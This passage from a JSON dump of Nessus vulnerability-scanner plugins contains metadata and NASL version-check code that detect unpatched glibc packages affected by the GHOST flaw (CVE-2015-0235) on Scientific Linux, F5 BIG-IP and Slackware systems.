glibc on SL6.x, SL7.x i386/x86_64 (20150127) (GHOST)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n 
script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1501&L=scientific-linux-errata&T=0&P=2821\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c384376c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:fermilab:scientific_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"glibc-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-common-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-debuginfo-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-debuginfo-common-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-devel-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-headers-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-static-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-utils-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"nscd-2.12-1.149.el6_6.5\")) flag++;\n\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"glibc-2.17-55.el7_0.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"glibc-common-2.17-55.el7_0.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.17-55.el7_0.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"glibc-debuginfo-common-2.17-55.el7_0.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"glibc-devel-2.17-55.el7_0.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"glibc-headers-2.17-55.el7_0.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"glibc-static-2.17-55.el7_0.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", 
reference:\"glibc-utils-2.17-55.el7_0.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"nscd-2.17-55.el7_0.5\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T15:01:21", "description": "A heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker may be able to use this flaw to execute arbitrary code.(CVE-2015-0235)\n\nImpact\n\nA remote attacker may be able to execute arbitrary code.", "cvss3": {}, "published": "2015-09-18T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : GHOST: glibc gethostbyname buffer overflow vulnerability (K16057) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2021-03-10T00:00:00", "cpe": ["cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_global_traffic_manager", 
"cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_wan_optimization_manager", "cpe:/a:f5:big-ip_webaccelerator", "cpe:/h:f5:big-ip", "cpe:/h:f5:big-ip_protocol_security_manager"], "id": "F5_BIGIP_SOL16057.NASL", "href": "https://www.tenable.com/plugins/nessus/86009", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K16057.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86009);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/10\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n\n script_name(english:\"F5 Networks BIG-IP : GHOST: glibc gethostbyname buffer overflow vulnerability (K16057) (GHOST)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"A heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. 
A remote\nattacker may be able to use this flaw to execute arbitrary\ncode.(CVE-2015-0235)\n\nImpact\n\nA remote attacker may be able to execute arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K16057\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K16057.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/18\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! 
get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K16057\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.3.0-11.5.1\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF4\",\"11.5.2-11.5.5\",\"11.5.1HF8\",\"11.5.0HF7\",\"11.4.1HF8\",\"11.4.0HF10\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.4.0-11.5.1\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF4\",\"11.5.2-11.5.5\",\"11.5.1HF8\",\"11.5.0HF7\",\"11.4.1HF8\",\"11.4.0HF10\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.1\",\"10.1.0-10.2.4\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF4\",\"11.5.2-11.5.5\",\"11.5.1HF8\",\"11.5.0HF7\",\"11.4.1HF8\",\"11.4.0HF10\",\"11.2.1HF14\",\"10.2.4HF11\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.1\",\"10.1.0-10.2.4\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF4\",\"11.5.2-11.5.5\",\"11.5.1HF8\",\"11.5.0HF7\",\"11.4.1HF8\",\"11.4.0HF10\",\"11.2.1HF14\",\"10.2.4HF11\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.1\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF4\",\"11.5.2-11.5.5\",\"11.5.1HF8\",\"11.5.0HF7\",\"11.4.1HF8\",\"11.4.0HF10\",\"11.2.1HF14\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.1\",\"10.1.0-10.2.4\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"11.6.0HF4\",\"11.5.2-11.5.5\",\"11.5.1HF8\",\"11.5.0HF7\",\"11.4.1HF8\",\"11.4.0HF10\",\"11.2.1HF14\",\"10.2.4HF11\");\n\n# LC\nvmatrix[\"LC\"] = 
make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.1\",\"10.1.0-10.2.4\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF4\",\"11.5.2-11.5.5\",\"11.5.1HF8\",\"11.5.0HF7\",\"11.4.1HF8\",\"11.4.0HF10\",\"11.2.1HF14\",\"10.2.4HF11\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.1\",\"10.1.0-10.2.4\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF4\",\"11.5.2-11.5.5\",\"11.5.1HF8\",\"11.5.0HF7\",\"11.4.1HF8\",\"11.4.0HF10\",\"11.2.1HF14\",\"10.2.4HF11\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.3.0-11.5.1\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF4\",\"11.5.2-11.5.5\",\"11.5.1HF8\",\"11.5.0HF7\",\"11.4.1HF8\",\"11.4.0HF10\");\n\n# PSM\nvmatrix[\"PSM\"] = make_array();\nvmatrix[\"PSM\"][\"affected\" ] = make_list(\"11.0.0-11.4.1\",\"10.1.0-10.2.4\");\nvmatrix[\"PSM\"][\"unaffected\"] = make_list(\"11.4.1HF8\",\"11.4.0HF10\",\"11.2.1HF14\",\"10.2.4HF11\");\n\n# WAM\nvmatrix[\"WAM\"] = make_array();\nvmatrix[\"WAM\"][\"affected\" ] = make_list(\"11.0.0-11.3.0\",\"10.1.0-10.2.4\");\nvmatrix[\"WAM\"][\"unaffected\"] = make_list(\"11.2.1HF14\",\"10.2.4HF11\");\n\n# WOM\nvmatrix[\"WOM\"] = make_array();\nvmatrix[\"WOM\"][\"affected\" ] = make_list(\"11.0.0-11.3.0\",\"10.1.0-10.2.4\");\nvmatrix[\"WOM\"][\"unaffected\"] = make_list(\"11.2.1HF14\",\"10.2.4HF11\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, 
{"lastseen": "2023-01-11T14:47:19", "description": "New glibc packages are available for Slackware 13.0, 13.1, 13.37, 14.0, and 14.1 to fix a security issue.", "cvss3": {}, "published": "2015-01-29T00:00:00", "type": "nessus", "title": "Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : glibc (SSA:2015-028-01) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:glibc", "p-cpe:/a:slackware:slackware_linux:glibc-i18n", "p-cpe:/a:slackware:slackware_linux:glibc-profile", "p-cpe:/a:slackware:slackware_linux:glibc-solibs", "p-cpe:/a:slackware:slackware_linux:glibc-zoneinfo", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:13.0", "cpe:/o:slackware:slackware_linux:13.1", "cpe:/o:slackware:slackware_linux:13.37", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux:14.1"], "id": "SLACKWARE_SSA_2015-028-01.NASL", "href": "https://www.tenable.com/plugins/nessus/81075", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2015-028-01. 
The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81075);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"SSA\", value:\"2015-028-01\");\n\n script_name(english:\"Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : glibc (SSA:2015-028-01) (GHOST)\");\n script_summary(english:\"Checks for updated packages in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New glibc packages are available for Slackware 13.0, 13.1, 13.37,\n14.0, and 14.1 to fix a security issue.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2015&m=slackware-security.1260924\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ccc24009\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:slackware:slackware_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:glibc-i18n\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:glibc-solibs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:glibc-zoneinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) 
audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.0\", pkgname:\"glibc\", pkgver:\"2.9\", pkgarch:\"i486\", pkgnum:\"7_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", pkgname:\"glibc-i18n\", pkgver:\"2.9\", pkgarch:\"i486\", pkgnum:\"7_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", pkgname:\"glibc-profile\", pkgver:\"2.9\", pkgarch:\"i486\", pkgnum:\"7_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", pkgname:\"glibc-solibs\", pkgver:\"2.9\", pkgarch:\"i486\", pkgnum:\"7_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"glibc\", pkgver:\"2.9\", pkgarch:\"x86_64\", pkgnum:\"7_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"glibc-i18n\", pkgver:\"2.9\", pkgarch:\"x86_64\", pkgnum:\"7_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"glibc-profile\", pkgver:\"2.9\", pkgarch:\"x86_64\", pkgnum:\"7_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"glibc-solibs\", pkgver:\"2.9\", pkgarch:\"x86_64\", pkgnum:\"7_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"13.1\", pkgname:\"glibc\", pkgver:\"2.11.1\", pkgarch:\"i486\", pkgnum:\"9_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", pkgname:\"glibc-i18n\", pkgver:\"2.11.1\", pkgarch:\"i486\", pkgnum:\"9_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", pkgname:\"glibc-profile\", pkgver:\"2.11.1\", pkgarch:\"i486\", pkgnum:\"9_slack13.1\")) 
flag++;\nif (slackware_check(osver:\"13.1\", pkgname:\"glibc-solibs\", pkgver:\"2.11.1\", pkgarch:\"i486\", pkgnum:\"9_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"glibc\", pkgver:\"2.11.1\", pkgarch:\"x86_64\", pkgnum:\"9_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"glibc-i18n\", pkgver:\"2.11.1\", pkgarch:\"x86_64\", pkgnum:\"9_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"glibc-profile\", pkgver:\"2.11.1\", pkgarch:\"x86_64\", pkgnum:\"9_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"glibc-solibs\", pkgver:\"2.11.1\", pkgarch:\"x86_64\", pkgnum:\"9_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"glibc\", pkgver:\"2.13\", pkgarch:\"i486\", pkgnum:\"8_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", pkgname:\"glibc-i18n\", pkgver:\"2.13\", pkgarch:\"i486\", pkgnum:\"8_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", pkgname:\"glibc-profile\", pkgver:\"2.13\", pkgarch:\"i486\", pkgnum:\"8_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", pkgname:\"glibc-solibs\", pkgver:\"2.13\", pkgarch:\"i486\", pkgnum:\"8_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"glibc\", pkgver:\"2.13\", pkgarch:\"x86_64\", pkgnum:\"8_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"glibc-i18n\", pkgver:\"2.13\", pkgarch:\"x86_64\", 